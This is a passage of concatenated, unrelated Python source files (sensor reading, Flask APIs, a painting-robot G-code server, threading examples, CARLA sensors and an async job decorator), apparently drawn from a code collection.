TRIG_DIR = 31  # right sensor trigger
ECHO_ESQ = 35  # left sensor echo
TRIG_ESQ = 37  # left sensor trigger
# Latest readings in cm, written by the measurement threads.
distancia_cm_esquerda = 0
distancia_cm_direita = 0
def setup_sensor_som():
    """Configure GPIO directions for both ultrasonic sensors."""
    GPIO.setup(ECHO_DIR, GPIO.IN)
    GPIO.setup(TRIG_DIR, GPIO.OUT)
    GPIO.setup(ECHO_ESQ, GPIO.IN)
    GPIO.setup(TRIG_ESQ, GPIO.OUT)
def roda_medicao():
    """Trigger both sensors in parallel and return the nearer distance (cm).

    Fix: Thread.isAlive() was removed in Python 3.9 — use join() instead.
    join() also replaces the previous busy-wait loop, which spammed
    "Processando" to stdout while polling the threads.
    """
    time.sleep(0.5)
    t1 = threading.Thread(target=pulso_esquerdo, args=())
    t1.start()
    t2 = threading.Thread(target=pulso_direito, args=())
    t2.start()
    # Block until both measurements have been stored in the globals.
    t1.join()
    t2.join()
    return get_distancia()
def pulso_esquerdo():
    """Measure the left sensor: send a 10 µs trigger pulse, time the echo."""
    global distancia_cm_esquerda
    distancia_cm_esquerda = 0
    GPIO.output(TRIG_ESQ, GPIO.HIGH)
    time.sleep (0.000010)  # 10 us trigger pulse
    GPIO.output(TRIG_ESQ, GPIO.LOW)
    # NOTE(review): if the echo line never changes state these loops spin
    # forever, and the timestamps below could be unbound if the pulse is
    # missed — confirm the sensor guarantees the expected sequence.
    while GPIO.input(ECHO_ESQ) == 0:
        pulso_inicial_esquerda = time.time()
    while GPIO.input(ECHO_ESQ) == 1:
        pulso_final_esquerda = time.time()
    duracao_pulso_esquerda = pulso_final_esquerda - pulso_inicial_esquerda
    # Speed of sound ~34300 cm/s; halve the duration for the round trip.
    distancia_cm_esquerda = 34300 * (duracao_pulso_esquerda/2)
    distancia_cm_esquerda = round(distancia_cm_esquerda, 0)
def pulso_direito():
    """Measure the right sensor: send a 10 µs trigger pulse, time the echo.

    Fix: the reset was misspelled "distnacia_cm_direita", which only created
    a junk local instead of zeroing the module-level reading.
    """
    global distancia_cm_direita
    distancia_cm_direita = 0
    GPIO.output(TRIG_DIR, GPIO.HIGH)
    time.sleep(0.000010)  # 10 us trigger pulse
    GPIO.output(TRIG_DIR, GPIO.LOW)
    while GPIO.input(ECHO_DIR) == 0:
        pulso_inicial_direita = time.time()
    while GPIO.input(ECHO_DIR) == 1:
        pulso_final_direita = time.time()
    duracao_pulso_direita = pulso_final_direita - pulso_inicial_direita
    # Speed of sound ~34300 cm/s; halve the duration for the round trip.
    distancia_cm_direita = 34300 * (duracao_pulso_direita/2)
    distancia_cm_direita = round(distancia_cm_direita, 0)
def get_distancia():
    """Print both sensor readings and return the nearer distance in cm."""
    print("Esquerda: "+str(distancia_cm_esquerda))
    print("Direita: "+str(distancia_cm_direita))
    # Report whichever obstacle is closer.
    return min(distancia_cm_esquerda, distancia_cm_direita)
#setup_sensor()
#roda_medicao()
#get_distancia()
|
index.py | from flask import Flask
from flask import jsonify, abort
from flask import request
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address, get_ipaddr
from flask_cors import CORS, cross_origin
from queue import Queue
import threading
import waitingtimes
import hashlib
import json
app = Flask(__name__)
# Work queue feeding worker_fulldetail with place-detail lookups.
q_detail = Queue()
# Rate limiting keyed on the caller's IP address.
limiter = Limiter(
    app,
    key_func=get_ipaddr,
    default_limits=["10000 per day", "1000 per hour"]
)
cors = CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
# rate limit 10/sec
@app.route("/geocode", methods=["GET"])
@cross_origin()
def get_geocode_address():
    """
    Retrieve information about the location from the lat/lng query params.

    Returns 400 when either coordinate is missing and 500 when the
    reverse-geocode lookup fails.
    """
    lat = request.args.get("lat")
    lng = request.args.get("lng")
    # Idiom fix: compare against None with `is None`, not `==`.
    if lng is None or lat is None:
        abort(400, "You need to provide at least your gps coords")
    try:
        response = waitingtimes.get_address_from_geocode(lat, lng)
    except Exception as e:
        abort(500, e)
    return jsonify(response)
def worker_fulldetail():
    """
    worker for the queue; it will serve the results then
    """
    # NOTE(review): formattedPlaces is a module-level list shared with the
    # /places/explore handler — concurrent requests will interleave their
    # results into each other's responses; confirm single-request usage.
    global q_detail, formattedPlaces
    while True:
        item = q_detail.get()
        try:
            formattedPlaces.append(waitingtimes.get_by_fulldetail(item))
        except Exception as e:
            # Best-effort: log and keep draining the queue.
            print(e)
        q_detail.task_done()
@app.route("/places/get-waiting-times", methods=["POST"])
@cross_origin()
def get_place_from_place_name_address():
    """Return waiting-time details for the place described in the JSON body."""
    wait_times = waitingtimes.get_by_fulldetail(request.json)
    return jsonify(wait_times)
@app.route("/places/get-by-name", methods=["GET"])
@cross_origin()
def get_places_by_name():
    """Look up a single place by free-text query and address.

    Builds a skeleton place record and lets get_by_fulldetail fill it in;
    the place_id is derived from the resolved coordinates.
    """
    places = []
    q = request.args.get("q")  # supermarket or pharmacy
    address = request.args.get("address")  # porta nuova, milano
    if (q == None or address == None):
        abort(400, "You need to provide your query string and your address")
    item = {
        "place_id": "",
        "formatted_address": address,
        "name": q,
        "types": "",
        "place_types": "",
        "geometry": {
            "location": {
                "lat": "",
                "lng": ""
            }
        }
    }
    result = waitingtimes.get_by_fulldetail(item, True)
    # Synthetic id: md5 of the concatenated resolved coordinates.
    result["place_id"] = hashlib.md5((str(result["coordinates"]["lat"])+str(result["coordinates"]["lng"])).encode("utf-8")).hexdigest()
    places.append(result)
    return jsonify(places)
@app.route("/places/explore", methods=["GET"])
@cross_origin()
def get_places_from_google():
    """Search places matching q near address and enrich them via the queue.

    Results are accumulated by worker_fulldetail into the shared
    formattedPlaces list; q_detail.join() blocks until all are processed.
    """
    # NOTE(review): module-level formattedPlaces is reset per request but
    # shared across requests — concurrent calls can mix results; confirm.
    global q_detail, formattedPlaces
    QUERY_SEARCH = "{} near {} open now"
    q = request.args.get("q")  # supermarket or pharmacy
    address = request.args.get("address")  # porta nuova, milano
    if (q == None or address == None):
        abort(400, "You need to provide your query string and your address")
    try:
        places = waitingtimes.get_places_from_google(QUERY_SEARCH.format(q, address))
    except Exception as e:
        abort(500, e)
    formattedPlaces = []
    if (len(places) > 0):
        for place in places:
            if (place["name"] == None):
                continue
            # Enqueue for the background worker; id is md5 of the coords.
            q_detail.put({
                "place_id": hashlib.md5((str(place["location"]["lat"])+str(place["location"]["lng"])).encode("utf-8")).hexdigest(),
                "formatted_address": place["address"],
                "name": place["name"],
                "types": place["categories"],
                "place_types": place["place_types"],
                "geometry": {
                    "location": {
                        "lat": place["location"]["lat"],
                        "lng": place["location"]["lng"]
                    }
                }
            })
        # Wait until the worker has drained every queued place.
        q_detail.join()
    return jsonify(formattedPlaces)
@app.route("/logger", methods=["POST"])
@cross_origin()
def save_client_log():
try:
log = request.json
with(open("/tmp/covid-client-map.log", "a")) as f:
log["remote_addr"] = get_ipaddr()
f.write(json.dumps(log) + "\n")
f.close()
except Exception as e:
print(e)
return jsonify({"ok": 200})
""" @app.route("/places/browse", methods=["GET"])
def get_places_from_here():
lat = request.args.get("lat")
lng = request.args.get("lng")
if (lng == None or lat == None):
abort(400, "You need to provide at least your gps coords (lat, lng)")
try:
places = waitingtimes.get_places_from_here({
"types": ["food-drink", "pharmacy", "post-office", "postal-area"],
"location": {
"lat": lat,
"lng": lng
},
"radius": 6000
})
except Exception as e:
abort(500, e)
formattedPlaces = []
if (len(places) > 0):
for x in range(0, len(places)-1):
print("processing: " + places[x]["title"])
formattedPlaces.append(
waitingtimes.get_by_fulldetail({
"accepted_place_type": ["bakery", "bank", "bar", "cafe", "doctor", "drugstore", "food", "health", "hospital", "meal_delivery", "meal_takeaway", "pharmacy", "post_office", "postal_code", "postal_town", "restaurant", "shopping_mall", "supermarket", "grocery_store", "discount_supermarket", "supermarket", "grocery"],
"place_id": places[x]["id"],
"formatted_address": places[x]["vicinity"].replace("\n", " "),
"name": places[x]["title"],
"types": places[x]["category"]["id"],
"geometry": {
"location": {
"lat": places[x]["position"][0],
"lng": places[x]["position"][1]
}
}
})
)
return jsonify(formattedPlaces) """
if __name__ == '__main__':
    # Start the background worker that resolves queued place details.
    # (A `while threading.active_count() <= 60: break` loop stood here; it
    # broke on the first iteration and so did nothing — removed.)
    try:
        t = threading.Thread(target=worker_fulldetail)
        t.daemon = True
        t.start()
    except Exception as e:
        print(e)
    app.run(port=2354, threaded=True)
|
server.py | from __future__ import print_function
from flask import Flask, jsonify, request
from flask_socketio import SocketIO, emit
from collections import namedtuple
from sendgcode import GCodeSender
import sys
import time
import threading
import math
# Flask + Socket.IO application setup for the painting-robot server.
app = Flask(__name__)
app.config['SECRET_KEY'] = 'Idontcareaboutsecurityinthisapp'
socketio = SocketIO(app)
# Socket.IO session ids of currently connected clients.
sids = set()
# Signalled whenever the command buffer gains data or pause state changes.
bufferData = threading.Event()
alive = True
# Pending plotter commands as (tag, payload) tuples; tags are below.
buffer = []
BUFFER_GCODE = 'g'
BUFFER_CALLBACK = 'c'
BUFFER_MESSAGE = 'm'
BUFFER_MOVE_XY = 'xy'
BUFFER_MOVE_Z = 'z'
BUFFER_SET_XYZ = 'sxyz'
BUFFER_STEPPERS = 'S'
# positions in mm
home = (28.641,220.647,10)
# A tool station (water pot / paint colour): its position plus the wiggle
# pattern used to dip the brush.
Tool = namedtuple('Tool', ['x','y','wiggleAxis','wiggleDistance','wiggleIterations'])
Rect = namedtuple('Rect', ['x0','y0','width','height'])
def RTool(x0,y0,w,h):
    # NOTE(review): Tool has five fields (x, y, wiggleAxis, wiggleDistance,
    # wiggleIterations) but only four arguments are supplied, so calling
    # RTool raises TypeError.  It is currently unused (the `tools` table
    # constructs Tool directly) — confirm intent before fixing or deleting.
    return Tool(x0+w/2,y0+h/2,w,h)
# Pen Z heights in mm: downZ touches the paper, upZ is the travel height.
downZ = 0
upZ = 15
stepsPerMM = 17.78
# Palette geometry (mm).
colorVerticalSpacing = 25.564
color0Y = 176.911
colorX = 15.094
# Feed rates in mm/s (converted to mm/min when G-code is emitted).
penUpSpeed=40
penDownSpeed=35
zSpeed=15
# True while the stepper drivers are energised.
motors = False
# Tool stations: three water pots and eight paint colours.
tools = { "water0": Tool(8.659+55.269/2,169.548+55.269/2,'y', 0.3, 2),
    "water1": Tool(8.659+55.269/2,97.606+55.269/2,'y', 0.3, 2),
    "water2": Tool(8.659+55.269/2,25.663+55.269/2,'y', 0.3, 2),
    "color0": Tool(colorX, color0Y-colorVerticalSpacing*0, 'xy', 17, 4),
    "color1": Tool(colorX, color0Y-colorVerticalSpacing*1, 'xy', 17, 4),
    "color2": Tool(colorX, color0Y-colorVerticalSpacing*2, 'xy', 17, 4),
    "color3": Tool(colorX, color0Y-colorVerticalSpacing*3, 'xy', 17, 4),
    "color4": Tool(colorX, color0Y-colorVerticalSpacing*4, 'xy', 17, 4),
    "color5": Tool(colorX, color0Y-colorVerticalSpacing*5, 'xy', 17, 4),
    "color6": Tool(colorX, color0Y-colorVerticalSpacing*6, 'xy', 17, 4),
    "color7": Tool(colorX, color0Y-colorVerticalSpacing*7, 'xy', 17, 4)
    }
# Drawable paper area in machine coordinates (mm).
canvas = Rect(104.81, 6.116, 286.250, 214.812)
# Current logical pen state (machine coordinates, mm).
penX = home[0]
penY = home[1]
penHeight = 0
servoHeight = 0 # TODO
currentTool = "water0"
lastDuration = 0 # TODO
# Total XY travel, accumulated in mm (reported to clients in steps/mm units).
distanceCounter = 0
paused = False
def getTimestamp():
    """Return the current local time as a human-readable string.

    TODO: worry about locale.
    """
    fmt = "%a %b %d %Y %X %Z"
    return time.strftime(fmt)
def getPositionXSteps():
    """Current pen X position in motor steps, relative to the park position."""
    offset_mm = penX - home[0]
    # int(x + 0.5) reproduces the original rounding exactly.
    return int(offset_mm * stepsPerMM + 0.5)
def getPositionYSteps():
    """Current pen Y position in motor steps (Y axis is inverted vs. machine mm)."""
    offset_mm = home[1] - penY
    return int(offset_mm * stepsPerMM + 0.5)
def getPenData():
    """Snapshot of the pen state in the wire format the client expects."""
    return {
        'x': getPositionXSteps(),
        'y': getPositionYSteps(),
        'state': penHeight,
        'height': servoHeight,
        'power': 0,
        'tool': currentTool,
        'lastDuration': lastDuration,
        'distanceCounter': distanceCounter / stepsPerMM,
        'simulation': 0,
    }
@socketio.on('connect')
def chat_connect():
    """Track the new client's sid and push it the current pen/buffer state."""
    print ('socket.io connected',request.sid,request.namespace)
    sids.add(request.sid)
    myEmit('pen update', getPenData())
    bufferUpdate()
@socketio.on('disconnect')
def chat_disconnect():
    """Forget the departing client's sid."""
    # discard() instead of remove(): the sid may be absent if the connect
    # handler failed part-way, and the disconnect handler must not raise.
    sids.discard(request.sid)
    print ("Client disconnected")
def myEmit(m, d):
    """Emit event *m* with payload *d* to every tracked client individually
    (server-initiated emits need an explicit room/namespace)."""
    for sid in sids:
        emit(m, d, room=sid, namespace='/')
@socketio.on('broadcast')
def chat_broadcast(message):
    """Debug handler: echo the payload back on the 'chat' event."""
    print ("test")
    emit("chat", {'data': message['data']})
@socketio.on('message')
def handle_message(message):
    """Log raw socket.io messages (debugging aid)."""
    print('received message: ' + message)
def ensureMotorsActive():
    """Energise the steppers and re-sync firmware coordinates if they were off.

    Must run before any queued move: the G92-style BUFFER_SET_XYZ tells the
    firmware where the pen currently is so absolute moves stay correct.
    """
    global motors
    if not motors:
        addBuffer(BUFFER_STEPPERS, True)
        # Z is interpolated from the logical penHeight (0 = upZ, 1 = downZ).
        addBuffer(BUFFER_SET_XYZ, (penX,penY,(1-penHeight)*upZ+penHeight*downZ))
        motors = True
def moveXY(xy):
    """Queue a pen move to absolute (x, y) mm and update the travel odometer."""
    global distanceCounter, penX, penY
    ensureMotorsActive()
    addBuffer(BUFFER_MOVE_XY, xy)
    dx = xy[0] - penX
    dy = xy[1] - penY
    distanceCounter += math.sqrt(dx ** 2 + dy ** 2)
    penX, penY = xy[0], xy[1]
def moveZ(z):
    """Queue a pen height move to absolute *z* mm and track the logical state.

    penHeight is 0.0 at upZ (travel) and 1.0 at downZ (touching the paper).
    """
    # Bug fix: without this `global`, the assignment below created a local
    # and the module-level penHeight (reported by getPenData and used by
    # ensureMotorsActive) never changed.
    global penHeight
    ensureMotorsActive()
    addBuffer(BUFFER_MOVE_Z, z)
    penHeight = (upZ-z)/(upZ-downZ)
def setTool(toolName):
    """Move to *toolName*'s station, dip with its wiggle pattern, and lift.

    Unknown tool names are logged and ignored.
    """
    global currentTool
    tool = tools.get(toolName)
    if tool is None:
        print('unknown tool: ' + toolName)
        return
    print("Set tool", toolName)
    currentTool = toolName
    moveZ(upZ)
    moveXY((tool.x, tool.y))
    moveZ(downZ)
    # Wiggle to pick up water/paint: offset back and forth on each axis the
    # tool lists ('x', 'y' or both).
    for _ in range(tool.wiggleIterations):
        for axis in tool.wiggleAxis:
            if axis == 'x':
                offsets = ((-tool.wiggleDistance, 0), (tool.wiggleDistance, 0))
            else:
                offsets = ((0, -tool.wiggleDistance), (0, tool.wiggleDistance))
            for ox, oy in offsets:
                moveXY((tool.x + ox, tool.y + oy))
    moveXY((tool.x, tool.y))
    moveZ(upZ)
def clearBuffer():
    """Drop every queued command and notify clients."""
    # Bug fix: `buffer = []` bound a *local* name, leaving the shared module
    # list untouched.  Clear it in place instead so every reference
    # (including the communicator thread's) sees it empty.
    del buffer[:]
    bufferUpdate()
    return jsonify( { 'status': 'buffer cleared' } )
@app.route('/')
def index():
    """Trivial liveness endpoint."""
    return "Hello, World!"
@app.route('/v1/tools', methods=['GET'])
def handle_tools_GET():
    """List the available tool names, alphabetically."""
    # Bug fix: the original called the undefined name `sort` (NameError at
    # request time); the built-in sorted() also already returns a list.
    return jsonify({'tools': sorted(tools)})
@app.route('/v1/tools/<tool>', methods=['PUT'])
def handle_tools_PUT(tool):
    """Select *tool*: dip the brush at its station."""
    if tool not in tools:
        # The original fell through and returned None, which Flask turns
        # into a 500; report the problem explicitly instead.
        return jsonify({'status': 'Unknown tool ' + tool}), 404
    setTool(tool)
    return jsonify({'status': 'Tool changed to '+tool})
@app.route('/v1/motors', methods=['DELETE','PUT'])
def handle_motors():
    """DELETE de-energises the steppers; PUT re-zeroes them at the park position."""
    # Bug fix: penX/penY/penHeight were assigned without `global`, so the
    # PUT branch silently updated locals and the real pen state never reset.
    global motors, penX, penY, penHeight
    if request.method == 'DELETE':
        addBuffer(BUFFER_STEPPERS, False)
        motors = False
        return jsonify({'status': 'Disabled'})
    elif request.method == 'PUT':
        penX, penY = home[0], home[1]
        penHeight = 0
        addBuffer(BUFFER_SET_XYZ, home)
        return jsonify({'status': 'Motor offset reset to park position'})
@app.route('/v1/pen', methods=['GET','PUT','DELETE'])
def handle_pen():
    """Pen state endpoint.

    GET    -> current pen data.
    DELETE -> lift the pen and park it at home.
    PUT    -> one of: {'x','y'} percent move; {'resetCounter'} odometer
              reset; {'state'} height ('wash'/'wipe'/'paint'/'up' or 0..1).
    """
    # Bug fix: the resetCounter branch assigned distanceCounter without
    # `global`, so the odometer was never actually cleared.
    global distanceCounter
    if request.method == 'GET':
        return jsonify(getPenData())
    elif request.method == 'DELETE':
        moveZ(upZ)
        moveXY(home)
        return jsonify(getPenData())
    elif request.method == 'PUT':
        try:
            x = request.json['x']
            y = request.json['y']
            # x/y arrive as 0..100 percent of the canvas; y grows downward.
            moveXY( ( canvas.x0 + canvas.width * x / 100., canvas.y0 + canvas.height * (1.-y/100.) ) )
            return jsonify(getPenData())
        except KeyError:
            try:
                if request.json['resetCounter']:
                    distanceCounter = 0
                    return jsonify(getPenData())
            except KeyError:
                state = request.json['state']
                if state == 'wash':
                    state = 1.2
                elif state == 'wipe':
                    state = 0.9
                elif state == 'paint':
                    state = 1.0
                elif state == 'up':
                    state = 0.0
                else:
                    try:
                        state = float(state)
                        if state < 0:
                            state = 0.
                        elif state > 1:
                            state = 1.
                    except (TypeError, ValueError):
                        # Narrowed from a bare except: only conversion
                        # failures mean "ignore the request".
                        return jsonify(getPenData())
                moveZ( state * downZ + (1-state) * upZ )
                return jsonify(getPenData())
    else:
        return jsonify(getPenData())
@app.route('/v1/buffer', methods=['GET','POST','PUT','DELETE'])
def handle_buffer():
    """Inspect (GET), pause/resume (PUT), clear (DELETE) or append a
    message/callback item (POST) to the command buffer."""
    # Bug fix: without `global`, the PUT assignment made `paused` local to
    # this call, so the pause flag never changed AND the GET/DELETE paths
    # raised NameError inside getData() (unbound closure variable).
    global paused
    def getData():
        return jsonify({'running': False, 'paused': paused, 'count': len(buffer), 'buffer': buffer})
    if request.method == 'DELETE':
        return clearBuffer()
    elif request.method == 'GET':
        return getData()
    elif request.method == 'PUT':
        paused = request.json.get('paused', False)
        print('paused',paused)
        # Wake the communicator so it notices the new pause state.
        bufferData.set()
        bufferUpdate()
        return getData()
    elif request.method == 'POST':
        msg = request.json.get('message',None)
        if msg:
            addBuffer(BUFFER_MESSAGE,msg)
        cb = request.json.get('callback',None)
        if cb:
            addBuffer(BUFFER_CALLBACK,cb)
        return jsonify({'status': "Message added to buffer"})
def addBuffer(type,data):
    # Append one (tag, payload) command and wake the serial communicator.
    # NOTE: the first parameter shadows the built-in `type`; kept as-is for
    # API stability.
    buffer.append((type,data))
    bufferData.set()
# Coordinates last sent to the firmware (may lag the requested pen state
# while the buffer drains).
outXY = home
outZ = upZ
def sendBufferLine(sender):
    """Translate and send the oldest buffered command as G-code via *sender*.

    Updates outXY/outZ to mirror what the firmware was last told, and always
    re-broadcasts the buffer state to clients.
    """
    global outXY, outZ
    if not buffer:
        return
    data = buffer.pop(0)
    cmds = []
    if data[0] == BUFFER_CALLBACK:
        print("Callback update:", data[1])
        myEmit('callback update', {'name': data[1], 'timestamp': getTimestamp() })
    elif data[0] == BUFFER_MESSAGE:
        print("Message:", data[1])
        myEmit('message update', {'message': data[1], 'timestamp': getTimestamp() })
    elif data[0] == BUFFER_MOVE_XY:
        # Rapid move (G00) when the pen is up, feed move (G01) when drawing.
        fast = outZ >= upZ - 0.01
        if fast:
            speed = 60 * penUpSpeed   # mm/s -> mm/min
            cmd = 'G00'
        else:
            speed = 60 * penDownSpeed
            cmd = 'G01'
        cmds.append( "%s F%.1f X%.3f Y%.3f" % (cmd, speed, data[1][0], data[1][1]) )
        outXY = data[1]
    elif data[0] == BUFFER_MOVE_Z:
        speed = 60 * zSpeed
        cmds.append( "G00 F%.1f Z%.3f" % (speed, data[1]) )
        outZ = data[1]
    elif data[0] == BUFFER_SET_XYZ:
        # Absolute mode, then redefine the current position without moving.
        cmds.append( "G90" )
        cmds.append( "G92 X%.3f Y%.3f Z%.3f" % data[1] )
    elif data[0] == BUFFER_STEPPERS:
        # M17/M18: energise / release the stepper motors.
        if data[1]:
            cmds.append( "M17" )
        else:
            cmds.append( "M18" )
    else:
        print("Unknown buffer item", data)
    if cmds:
        sender.sendCommands(cmds)
    bufferUpdate()
def bufferUpdate():
    """Push the buffer contents and run/pause state to every client."""
    payload = {
        'bufferList': [str(hash(item)) for item in buffer],
        'bufferData': {},
        'bufferRunning': alive,
        'bufferPaused': paused,
        'bufferPausePen': getPenData(),
    }
    myEmit('buffer update', payload)
def serialCommunicator(sender):
    """Worker thread: drain the command buffer to the G-code *sender*.

    Runs inside a test request context so Flask helpers used downstream
    work off the main thread.  Waits on bufferData, drains while not
    paused, then clears the event and waits again.
    """
    with app.test_request_context("/"):
        while True:
            bufferData.wait()
            if not alive:
                break
            while not paused and buffer:
                sendBufferLine(sender)
            # NOTE(review): clearing *after* the drain can swallow a set()
            # that arrived mid-drain; items are still picked up on the next
            # wake-up, so this only delays, never loses, commands.
            bufferData.clear()
if __name__ == '__main__':
    # Optional CLI: server.py [serial-port] [baud-rate]
    port = sys.argv[1] if len(sys.argv) >= 2 else "auto"
    speed = int(sys.argv[2]) if len(sys.argv) >= 3 else 115200
    sender = GCodeSender(port, speed)
    communicator = threading.Thread(target=serialCommunicator, args=(sender,))
    communicator.daemon = True
    communicator.start()
    # Sync the firmware to the park position before accepting commands.
    addBuffer(BUFFER_SET_XYZ, (home[0], home[1], upZ))
    try:
        # The original spelled this `debug=True and False`, i.e. just False.
        app.run(debug=False, use_reloader=False, port=42420)
    except KeyboardInterrupt:
        sender.close()
|
1_threads.py | import time
from threading import Thread
####### SINGLE THREAD
def ask_user():
    """I/O-bound task: prompt for a name, greet, and report elapsed time."""
    start = time.time()
    name = input('Enter your name: ')
    greeting = f'Hello, {name}'
    print(greeting)
    print('ask_user: ', time.time() - start)
def complex_calculation():
    """CPU-bound task: square twenty million integers (result discarded)."""
    print('Started calculating...')
    start = time.time()
    _ = [n ** 2 for n in range(20000000)]
    print('complex_calculation: ', time.time() - start)
# With a single thread, we can do one at a time—e.g.
start = time.time()
ask_user()
complex_calculation()
print('Single thread total time: ', time.time() - start, '\n\n')
####### TWO THREADS
# With two threads, we can do them both at once...
thread = Thread(target=complex_calculation)
thread2 = Thread(target=ask_user)
start = time.time()
thread.start()
thread2.start()
# Wait for both to finish before reading the clock.
thread.join()
thread2.join()
print('Two thread total time: ', time.time() - start)
# Run this and see what happens!
|
utils.py | import builtins
import datetime
import inspect
import threading
import time
# NOTE(review): `global` at module scope is a no-op; kept for fidelity.
global _c,_pq
# File-content cache keyed by path (see cache()).
_c={}
# Pending print queue; None until the first print() spawns the writer thread.
_pq=None
# Guards mutation of _pq across threads.
_tl=threading.Lock()
def _print_q():
    """Background writer: drains _pq, echoes each entry via the real print,
    and persists a rolling log to "log.log".

    NOTE(review): this loop busy-waits with no sleep when the queue is
    empty, and reads len(_pq) without holding _tl — confirm both before
    relying on this in production.
    """
    global _pq
    lt=time.time()
    # `storage` is a project-local module; presumably a filesystem wrapper —
    # verify its set_silent/read/write API against its source.
    fs=__import__("storage")
    fs.set_silent("log.log")
    dt=fs.read("log.log")
    lc=dt.count(b"\n")
    while (True):
        if (len(_pq)>0):
            _tl.acquire()
            # Pop the head: join its args into one string, keep the caller
            # frame info, and drop the entry from the queue.
            a,sf,_pq=" ".join([str(e) for e in _pq[0][0]]),_pq[0][1],_pq[1:]
            _tl.release()
            s=datetime.datetime.now().strftime(f"[{sf.filename[:-3]}{('.'+sf.function if sf.function!='<module>' else '')}, %H:%M:%S] {a}")
            builtins.print(s)
            dt+=bytes(s,"utf-8")+b"\n"
            lc+=1
            # Cap the in-memory log at ~1024 lines by trimming the oldest.
            if (lc>1024):
                dt=dt[dt.index(b"\n")+1:]
            # Flush to disk at most every 30 seconds.
            if (time.time()>lt):
                lt=time.time()+30
                fs.write("log.log",dt)
def cache(fp):
    """Return the bytes of file *fp*, reading it at most once per process."""
    global _c
    if fp not in _c:
        with open(fp, "rb") as fh:
            _c[fp] = fh.read()
    return _c[fp]
def print(*a):
    """Queue-based replacement for the built-in print().

    Deliberately shadows builtins.print: each call records its args plus
    the caller's frame, and the _print_q background thread does the actual
    echoing and log persistence.
    """
    global _pq
    if (_pq is None):
        # First call: seed the queue and start the writer thread.
        # NOTE(review): this check-then-start is racy if two threads hit
        # the first print() concurrently — confirm single-threaded startup.
        _pq=[(a,inspect.getouterframes(inspect.currentframe(),2)[1])]
        threading.Thread(target=_print_q).start()
    else:
        _tl.acquire()
        _pq+=[(a,inspect.getouterframes(inspect.currentframe(),2)[1])]
        _tl.release()
|
scene_layout_sensors.py |
import time
from threading import Thread
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
import scene_layout as scene_layout_parser # This should come from CARLA path
def threaded(fn):
    """Decorator: run *fn* in a daemon thread; the call returns the Thread."""
    def wrapper(*args, **kwargs):
        thread = Thread(target=fn, args=args, kwargs=kwargs)
        # Assign the attribute directly; Thread.setDaemon() is deprecated
        # (removal planned) in modern Python.
        thread.daemon = True
        thread.start()
        return thread
    return wrapper
class SceneLayoutMeasurement(object):
    """Pairs a scene-layout payload with the frame number it belongs to."""
    def __init__(self, data, frame_number):
        self.data, self.frame_number = data, frame_number
class SceneLayoutReader(object):
    """Pseudo sensor that delivers the static scene layout exactly once."""
    def __init__(self, world):
        """
        The scene layout just requires a reference to world where you will
        extract all the necessary information.
        """
        # The static scene dictionary of all the entire scene layout.
        self.static_scene_dict = scene_layout_parser.get_scene_layout(CarlaDataProvider.get_map())
        print("Map loaded. Number of waypoints: ", len(self.static_scene_dict))
        # Callback attribute to set the function being used.
        self._callback = None
        # Just connect the scene layout directly with the sensors
        self.read_scene_layout()
    def __call__(self):
        return self.static_scene_dict
    @threaded  # This thread just produces the callback once and dies.
    def read_scene_layout(self):
        # Poll until a callback is registered, deliver one measurement, exit.
        while True:
            # We will wait for the callback to be defined, produce a layout and then die.
            if self._callback is not None:
                self._callback(SceneLayoutMeasurement(self.__call__(), 0))
                break
            else:
                time.sleep(0.01)
    def listen(self, callback):
        # Tell that this function receives what the producer does.
        self._callback = callback
    def stop(self):
        # Nothing to stop here.
        pass
    def destroy(self):
        # Nothing to destroy here.
        pass
class ObjectMeasurements(object):
    """Pairs a dynamic-objects payload with the frame number it belongs to."""
    def __init__(self, data, frame_number):
        self.data, self.frame_number = data, frame_number
class ObjectFinder(object):
    """
    Pseudo sensor that gives you the position of all the other dynamic objects and their states
    """
    def __init__(self, world, reading_frequency):
        """
        The object finder is used to give you the positions of all the
        other dynamic objects in the scene and their properties.
        """
        # The world the class reads dynamic objects from.
        self._world = world
        # Map used by the object finder
        self._map = CarlaDataProvider.get_map()
        # Polling frequency in Hz.
        self._reading_frequency = reading_frequency
        self._callback = None
        # Counts the frames
        self._frame_number = 0
        self._run_ps = True
        self.find_objects()
    def __call__(self):
        """ We here work into getting all the dynamic objects """
        return scene_layout_parser.get_dynamic_objects(self._world, self._map)
    @threaded
    def find_objects(self):
        """Producer loop: invoke the callback at most `reading_frequency` Hz."""
        latest_speed_read = time.time()
        while self._run_ps:
            if self._callback is not None:
                capture = time.time()
                if capture - latest_speed_read > (1 / self._reading_frequency):
                    self._callback(ObjectMeasurements(self.__call__(), self._frame_number))
                    self._frame_number += 1
                    latest_speed_read = time.time()
                else:
                    # Bug fix: the original spun without sleeping between
                    # reads once a callback was set, pegging a CPU core.
                    time.sleep(0.001)
            else:
                time.sleep(0.001)
    def listen(self, callback):
        # Register the consumer for produced measurements.
        self._callback = callback
    def stop(self):
        self._run_ps = False
    def destroy(self):
        self._run_ps = False
|
decorators.py | import functools
import uuid
import threading
from flask import request, make_response, g, jsonify, url_for, \
copy_current_request_context
from . import app
import kvstore
CONSUL_ENDPOINT = app.config.get('CONSUL_ENDPOINT')
kv = kvstore.Client(CONSUL_ENDPOINT)
def asynchronous(f):
    """Run the request asynchronously.
    Inital response:
        - Status code 202 Accepted
        - Location header with the URL of a job resource.
    Job running:
        - A GET request to the job returns 202
    Job finished:
        - Status code 303 See Other
        - Location header points to the newly created resource
    The client then needs to send a DELETE request to the task resource to
    remove it from the system.
    """
    @functools.wraps(f)
    def decorator(*args, **kwargs):
        # Renamed from `id`, which shadowed the built-in.
        job_id = uuid.uuid4().hex
        kv.set('queue/{}/status'.format(job_id), 'pending')
        @copy_current_request_context
        def job():
            response = make_response(f(*args, **kwargs))
            status_code = response.status_code
            if status_code == 201:
                kv.set('queue/{}/status'.format(job_id), 'registered')
            else:
                kv.set('queue/{}/status'.format(job_id), 'error')
            kv.set('queue/{}/status_code'.format(job_id), status_code)
            # Bug fix: error responses may carry no Location header; use
            # .get() so the worker thread doesn't die with a KeyError.
            kv.set('queue/{}/url'.format(job_id), response.headers.get('Location', ''))
        # Use a distinct name for the thread so it doesn't shadow job().
        worker = threading.Thread(target=job)
        worker.start()
        location = url_for('api.get_async_job_status', id=job_id, _external=True)
        return jsonify({'url': location}), 202, {
            'Location': location}
    return decorator
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
